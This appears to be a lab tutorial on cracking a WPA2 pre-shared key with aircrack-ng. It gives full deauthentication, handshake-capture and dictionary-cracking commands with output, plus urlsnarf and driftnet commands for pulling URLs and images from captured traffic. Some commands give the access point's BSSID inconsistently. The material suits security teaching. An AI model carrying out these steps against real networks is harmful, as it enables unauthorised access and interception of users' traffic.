WiFi Sniffing
Summary
Sniff Wi-Fi traffic using wireless interfaces supporting monitor mode and packet injection (*). WPA/WPA2 uses various types of authentication. Aircrack-ng is only capable of cracking pre-shared keys! Meaning only networks using PSK can be attacked. (To determine if a network uses PSK, airodump-ng can be used). The method used to crack the pre-shared key is a plain brute force attack. This means the PSK needs to be in the dictionary used for the brute force attack. If it is not in the list, aircrack-ng can not determine the key. For WPA/WPA2 cracking the initial 4-way handshake is needed. This handshake is conducted between a client and the AP when a client tries to connect to the network.
Requirements
- Operating system: Kali Linux 64 Bit
- Wireless card: One that can inject packets Injection test
Prerequisites
The following information of the hardware used is needed:
- MAC of a wireless client in the network: 34:B2:0A:7D:17:77
- BSSID: 68:02:B8:1F:A1:3A
- ESSID: WLAN18250073
- Channel used by AP: 11
- Wireless interface: wlan0mon
Description
Overview
The following steps are needed to get the password:
1) Use monitor mode on the wireless interface using the AP channel
2) Using airodump-ng on AP channel, collecting needed handshake
3) Use aireplay-ng to deauthenticate a wireless client in the network
4) Use aircrack-ng to crack the key using the collected handshake
Step 1 - Use monitor mode on the wireless interface using the AP channel
To listen to every packet in the air the wireless card needs to be in monitor mode. If a wireless card is not in monitor mode it will only catch every packet addressed to itself. When listening to every packet send an attacker eventually captures a 4-way handshake used to crack WPA/WPA2. Additionally, one can deauthenticate wireless clients, explained in a later step.
Depending on the driver used by the card, different methods need to be used to enable monitor mode. This tutorial only shows the procedure for the madwifi-ng driver, for further information look at aircrack-ng's tutorial
Open a terminal and type :
airmon-ng
to determine the driver your card is using. The output with a wireless card from Atheros is the following:
PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
The next step is to switch to monitor mode. Syntax: airmon-ng start <interface> <channel used by AP>. Because we don't know the used channel from the AP we only start the monitoring mode without a specific channel:
airmon-ng start wlan0
Output:
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
605 NetworkManager
2948 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0mon ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
(mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)
Now we can check if the interface is in monitor mode using iwconfig:
iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
tun0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
As we can see the interface changed the name from wlan0 to wlan0mon and uses the monitor mode. With airodump-ng <interface> we can monitor all AP's within reach.
airodump-ng wlan0mon
The output presented shows all AP's with information like ESSUD, BSSID, PWR, beacons, channels, encryption, cipher, and authentication methods used
CH 4 ][ Elapsed: 1 min ][ 2021-12-17 10:40 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 68:02:B8:1F:A1:3A -50 46 31 0 11 130 WPA2 CCMP PSK WLAN18250073
Important for the further attack is the BSSID (69:02:B8:1F:A1:3A) and the used channel (11).
Step 2 - Using airodump-ng on AP channel, collecting needed handshake
Now we got the BSSID and channel of the AP we can start capturing the 4-way handshake. With the command airodump-ng -c <channel> --bssid <bssid> -w <filename> <interface>
airodump-ng -c 11 --bssid 68:02:B8:1F:A1:3A -w CapturedData wlan0mon
Output:
CH 11 ][ Elapsed: 12 s ][ 2021-12-17 11:38 4-Way Handshake CAPTURED BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 68:02:B8:1F:A1:3A -48 24 63 62 2 11 130 WPA2 CCMP PSK WLAN18250073 BSSID STATION PWR Rate Lost Frames Notes Probes 68:02:B8:1F:A1:3A 5C:5F:67:29:51:76 -18 0e- 0e 3 62 68:02:B8:1F:A1:3A 66:60:B5:63:1F:B9 -58 0 - 1 0 2
Note: In the top right corner, it says 4-way Handshake CAPTURED. This is just a placeholder edited in. Nothing is stated there until a handshake is captured. When captured it says: [WPA handshake: 68:02:B8:1F:A1:3A.#
Now the tool starts collecting every packet from this AP. It can take quite a while until a 4-way handshake is made. Step 3 helps to speed things up.
Step 3 - Use aireplay-ng to deauthenticate a wireless client in the network
A faster way to capture the 4-way handshake is to connect with an additional client to the wireless network manually. When connecting to the new network, the AP starts the 4-way handshake. Because this is impractical an attacker can deauthenticate clients already connected to a WiFi network to reinitialize the 4-way handshake. BSSID and MAC of the device to deauthenticate are needed to conduct the attack. Deauthenication is started with aireplay-ng -0 <number of deauths to send> -a <BSSID> -c <MAC of client> <interface>. It is important to state, that while a client is deauthenticated the tool used in Step 2 still needs to be running to capture the packets!
aireplay-ng -0 10 -a 69:02:B8:1F:A1:3A -c 34:B2:0A:7D:17:77 wlan0mon
the output:
11:21:15 Waiting for beacon frame (BSSID: 68:02:B8:1F:A1:3A) on channel 11 11:21:16 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs] 11:21:17 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|54 ACKs] 11:21:17 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|59 ACKs] 11:21:18 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|73 ACKs] 11:21:19 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|61 ACKs] 11:21:20 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|52 ACKs] 11:21:20 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|65 ACKs] 11:21:21 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|60 ACKs] 11:21:22 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs] 11:21:22 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|66 ACKs]
Step 4 - Use aircrack-ng to crack the key using the collected handshake
In this step, the captured 4-way handshake is used to crack the pre-shared key. The captured data is stored in a file called CapturedData (used in Step 2: -w CapturedData). One can use a dictionary which comes with aircrack-ng called "password.lst". Using the command:
aircrack-ng -w password.lst -b 69:02:B8:1F:A1:3A CapturedData*.cap
-w password.lst is the used dictionary -b is the BSSID of the AP The wildcard at the end of CapturedData is because aircrack-ng created multiple files
The output looks as follows:
[00:00:00] 2 keys tested (36.20 k/s)
KEY FOUND! [ AKITs1!]
Master Key : <Master Key>
Transcient Key : <Transcient Key>
Filter URLs from captured traffic:
urlsnarf -p alfa-01.cap
Filter pictures from captured traffic:
driftnet -f alfa-01.cap -a -d Pictures/
Disable monitor mode:
airmon-ng stop wlan1mon
(*) Test if the adapter supports injection:
aireplay-ng -9 wlan1mon
Detailed information about wireless adapters available in ELVIS can be found here.
(**) This command did not work with ALFA NETWORK AWUS036ACH and ALFA NETWORK AWUS036EAC. The following commands are an alternative way to start monitor mode on the adapter:
ifconfig wlan1 down iwconfig wlan1 mode monitor ifconfig wlan1 up
Results
| Browser | urlsnarf | driftnet |
|---|---|---|
| Microsoft Edge (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
| Mozilla Firefox (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
| Google Chrome (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
| Google Chrome (Android host) | no results reading the pcap file | no results reading the pcap file |
| Samsung Internet (Android host) | URLs captured | images captured |
Used Hardware
- Windows 10 host
- Kali Linux host
- Samsung Galaxy A8
- LG Nexus 5X Google Smartphone 32 GB, Android 6.0 Marshmallow, Carbon
- Panda 300 Mbps Wireless N USB Adapter PAU05
- Alfa AWUS036ACH Wide Range AC1200 Wireless Adapter
- Alfa AWUS036EAC AC1200 USB Wireless Adapter